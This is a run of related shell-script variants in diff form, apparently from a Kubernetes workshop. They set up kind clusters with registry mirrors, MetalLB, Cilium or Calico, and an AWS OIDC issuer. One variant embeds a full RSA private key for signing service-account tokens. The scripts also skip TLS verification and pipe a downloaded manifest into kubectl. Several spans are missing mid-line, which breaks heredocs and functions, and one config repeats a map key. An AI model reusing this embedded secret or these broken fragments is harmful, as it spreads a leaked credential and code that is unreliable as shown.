+1riYdvEb8To4H6/HtF+OKzuCIXFQ+bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL +395nvxdly83SUrdh7ItfOPRluuuiPHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0Zw +zIM9OviX8iEF8xHWUtz4BAMDG8N6+zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm +5X5uOKsCHMtNSjqYUNB1DxN6xxM+odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD8 +2p/16KQKU6TkZSrldkYxiHIPhu+5f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9 +ywIDAQAB +-----END PUBLIC KEY----- +EOF + +cat <<'EOF' >/tmp/oidc/sa-signer.key +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA53YiBcrn7+ZK0Vb4odeA1riYdvEb8To4H6/HtF+OKzuCIXFQ ++bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL395nvxdly83SUrdh7ItfOPRluuui +PHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0ZwzIM9OviX8iEF8xHWUtz4BAMDG8N6 
++zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm5X5uOKsCHMtNSjqYUNB1DxN6xxM+ +odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD82p/16KQKU6TkZSrldkYxiHIPhu+5 +f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9ywIDAQABAoIBAB8tro+RMYUDRHjG +el9ypAxIeWEsQVNRQFYkW4ZUiNYSAgl3Ni0svX6xAg989peFVL+9pLVIcfDthJxY +FVlNCjBxyQ/YmwHFC9vQkARJEd6eLUXsj8INtS0ubbp1VxCQRDDL0C/0z7OSoJJh +SwboqjEiTJExA2a+RArmEDTBRzdi3t+kT8G23JcqOivrITt17K6bQYyJXw7/vUdc +r/R+hfd5TqVq92VddzDT7RNJAxsbPPXjGnESlq1GALBDs+uBGYsP0fiEJb2nicSv +z9fBnBeERhut1gcE0C0iLRQZb+3r8TitBtxrZv+0BHgXrkKtXDwWTqGEKOwC4dBn +7nxkH2ECgYEA6+/DOTABGYOWOQftFkJMjcugzDrjoGpuXuVOTb65T+3FHAzU93zy +3bt3wQxrlugluyy9Sc/PL3ck2LgUsPHZ+s7zsdGvvGALBD6bOSSKATz9JgjwifO8 +PgqUz1kXRwez2CtKLOOCFFtcIzEdWIzsa1ubNqLzgN7rD+XBkUc2uEcCgYEA+yTy +72EDMQVoIZOygytHsDNdy0iS2RsBbdurT27wkYuFpFUVWdbNSL+8haE+wJHseHcw +BD4WIMpU+hnS4p4OO8+6V7PiXOS5E/se91EJigZAoixgDUiC8ihojWgK9PYEavUo +hULWbayO59SxYWeUI4Ze0GP8Jw8vdB86ib4ulF0CgYEAgyzRuLjk05+iZODwQyDn +WSquov3W0rh51s7cw0LX2wWSQm8r9NGGYhs5kJ5sLwGxAKj2MNSWF4jBdrCZ6Gr+ +y4BGY0X209/+IAUC3jlfdSLIiF4OBlT6AvB1HfclhvtUVUp0OhLfnpvQ1UwYScRI +KcRLvovIoIzP2g3emfwjAz8CgYEAxUHhOhm1mwRHJNBQTuxok0HVMrze8n1eov39 +0RcvBvJSVp+pdHXdqX1HwqHCmxhCZuAeq8ZkNP8WvZYY6HwCbAIdt5MHgbT4lXQR +f2l8F5gPnhFCpExG5ZLNg/urV3oAQE4stHap21zEpdyOMhZb6Yc5424U+EzaFdgN +b3EcPtUCgYAkKvUlSnBbgiJz1iaN6fuTqH0efavuFGMhjNmG7GtpNXdgyl1OWIuc +Yu+tZtHXtKYf3B99GwPrFzw/7yfDwae5YeWmi2/pFTH96wv3brJBqkAWY8G5Rsmd +qF50p34vIFqUBniNRwSArx8t2dq/CuAMgLAtSjh70Q6ZAnCF85PD8Q== +-----END RSA PRIVATE KEY----- +EOF + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + extraMounts: + - containerPath: /etc/kubernetes/oidc + hostPath: /tmp/oidc + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + 
podSubnet: "10.1${twodigits}.0.0/16" +kubeadmConfigPatches: +- | + kind: ClusterConfiguration + apiServer: + extraArgs: + service-account-key-file: /etc/kubernetes/pki/sa.pub + service-account-key-file: /etc/kubernetes/oidc/sa-signer-pkcs8.pub + service-account-signing-key-file: /etc/kubernetes/oidc/sa-signer.key + service-account-issuer: https://solo-workshop-oidc.s3.us-east-1.amazonaws.com + api-audiences: sts.amazonaws.com + extraVolumes: + - name: oidc + hostPath: /etc/kubernetes/oidc + mountPath: /etc/kubernetes/oidc + readOnly: true + metadata: + name: config +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +helm repo add cilium https://helm.cilium.io/ + +helm --kube-context kind-kind${number} install cilium cilium/cilium --version 1.15.5 \ + --namespace kube-system \ + --set prometheus.enabled=true \ + --set operator.prometheus.enabled=true \ + --set hubble.enabled=true \ + --set hubble.metrics.enabled="{dns:destinationContext=pod|ip;sourceContext=pod|ip,drop:destinationContext=pod|ip;sourceContext=pod|ip,tcp:destinationContext=pod|ip;sourceContext=pod|ip,flow:destinationContext=pod|ip;sourceContext=pod|ip,port-distribution:destinationContext=pod|ip;sourceContext=pod|ip}" \ + --set hubble.relay.enabled=true \ + --set hubble.ui.enabled=true \ + --set kubeProxyReplacement=partial \ + --set hostServices.enabled=false \ + --set hostServices.protocols="tcp" \ + --set externalIPs.enabled=true \ + --set nodePort.enabled=true \ + --set hostPort.enabled=true \ + --set bpf.masquerade=false \ + --set image.pullPolicy=IfNotPresent \ + --set cni.exclusive=false \ + --set ipam.mode=kubernetes +kubectl --context=kind-kind${number} -n kube-system rollout status ds cilium || true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl 
--context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! 
kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +mkdir -p /tmp/oidc + +cat <<'EOF' >/tmp/oidc/sa-signer-pkcs8.pub +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA53YiBcrn7+ZK0Vb4odeA +1riYdvEb8To4H6/HtF+OKzuCIXFQ+bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL +395nvxdly83SUrdh7ItfOPRluuuiPHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0Zw +zIM9OviX8iEF8xHWUtz4BAMDG8N6+zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm +5X5uOKsCHMtNSjqYUNB1DxN6xxM+odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD8 +2p/16KQKU6TkZSrldkYxiHIPhu+5f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9 +ywIDAQAB +-----END PUBLIC KEY----- +EOF + +cat <<'EOF' >/tmp/oidc/sa-signer.key +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA53YiBcrn7+ZK0Vb4odeA1riYdvEb8To4H6/HtF+OKzuCIXFQ ++bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL395nvxdly83SUrdh7ItfOPRluuui +PHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0ZwzIM9OviX8iEF8xHWUtz4BAMDG8N6 ++zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm5X5uOKsCHMtNSjqYUNB1DxN6xxM+ +odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD82p/16KQKU6TkZSrldkYxiHIPhu+5 +f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9ywIDAQABAoIBAB8tro+RMYUDRHjG +el9ypAxIeWEsQVNRQFYkW4ZUiNYSAgl3Ni0svX6xAg989peFVL+9pLVIcfDthJxY 
+FVlNCjBxyQ/YmwHFC9vQkARJEd6eLUXsj8INtS0ubbp1VxCQRDDL0C/0z7OSoJJh
+SwboqjEiTJExA2a+RArmEDTBRzdi3t+kT8G23JcqOivrITt17K6bQYyJXw7/vUdc
+r/R+hfd5TqVq92VddzDT7RNJAxsbPPXjGnESlq1GALBDs+uBGYsP0fiEJb2nicSv
+z9fBnBeERhut1gcE0C0iLRQZb+3r8TitBtxrZv+0BHgXrkKtXDwWTqGEKOwC4dBn
+7nxkH2ECgYEA6+/DOTABGYOWOQftFkJMjcugzDrjoGpuXuVOTb65T+3FHAzU93zy
+3bt3wQxrlugluyy9Sc/PL3ck2LgUsPHZ+s7zsdGvvGALBD6bOSSKATz9JgjwifO8
+PgqUz1kXRwez2CtKLOOCFFtcIzEdWIzsa1ubNqLzgN7rD+XBkUc2uEcCgYEA+yTy
+72EDMQVoIZOygytHsDNdy0iS2RsBbdurT27wkYuFpFUVWdbNSL+8haE+wJHseHcw
+BD4WIMpU+hnS4p4OO8+6V7PiXOS5E/se91EJigZAoixgDUiC8ihojWgK9PYEavUo
+hULWbayO59SxYWeUI4Ze0GP8Jw8vdB86ib4ulF0CgYEAgyzRuLjk05+iZODwQyDn
+WSquov3W0rh51s7cw0LX2wWSQm8r9NGGYhs5kJ5sLwGxAKj2MNSWF4jBdrCZ6Gr+
+y4BGY0X209/+IAUC3jlfdSLIiF4OBlT6AvB1HfclhvtUVUp0OhLfnpvQ1UwYScRI
+KcRLvovIoIzP2g3emfwjAz8CgYEAxUHhOhm1mwRHJNBQTuxok0HVMrze8n1eov39
+0RcvBvJSVp+pdHXdqX1HwqHCmxhCZuAeq8ZkNP8WvZYY6HwCbAIdt5MHgbT4lXQR
+f2l8F5gPnhFCpExG5ZLNg/urV3oAQE4stHap21zEpdyOMhZb6Yc5424U+EzaFdgN
+b3EcPtUCgYAkKvUlSnBbgiJz1iaN6fuTqH0efavuFGMhjNmG7GtpNXdgyl1OWIuc
+Yu+tZtHXtKYf3B99GwPrFzw/7yfDwae5YeWmi2/pFTH96wv3brJBqkAWY8G5Rsmd
+qF50p34vIFqUBniNRwSArx8t2dq/CuAMgLAtSjh70Q6ZAnCF85PD8Q==
+-----END RSA PRIVATE KEY-----
+EOF
+
+cat << EOF > kind${number}.yaml
+kind: Cluster
+apiVersion: kind.x-k8s.io/v1alpha4
+nodes:
+- role: control-plane
+  image: ${kindest_node}
+  extraPortMappings:
+  - containerPort: 6443
+    hostPort: 70${twodigits}
+  extraMounts:
+  - containerPath: /etc/kubernetes/oidc
+    hostPath: /tmp/oidc
+  labels:
+    ingress-ready: true
+    topology.kubernetes.io/region: ${region}
+    topology.kubernetes.io/zone: ${zone}
+networking:
+  serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16"
+  podSubnet: "10.1${twodigits}.0.0/16"
+kubeadmConfigPatches:
+- |
+  kind: ClusterConfiguration
+  apiServer:
+    extraArgs:
+      # extraArgs is a map, so the key can only appear once; the OIDC
+      # signer public key must be the value used for token verification
+      service-account-key-file: /etc/kubernetes/oidc/sa-signer-pkcs8.pub
+      service-account-signing-key-file: 
/etc/kubernetes/oidc/sa-signer.key + service-account-issuer: https://solo-workshop-oidc.s3.us-east-1.amazonaws.com + api-audiences: sts.amazonaws.com + extraVolumes: + - name: oidc + hostPath: /etc/kubernetes/oidc + mountPath: /etc/kubernetes/oidc + readOnly: true + metadata: + name: config +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 
+done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat <&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + ipFamily: ipv6 +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + 
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].GlobalIPv6Address') +networkkind=$(echo ${ipkind} | rev | cut -d: -f2- | rev): + +#kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}${number}1-${networkkind}${number}9 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" 
+for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + 
topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +curl -sL https://raw.githubusercontent.com/projectcalico/calico/v3.28.1/manifests/calico.yaml | sed 's/250m/50m/g' | kubectl --context kind-kind${number} apply -f - + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config 
get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + 
ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r 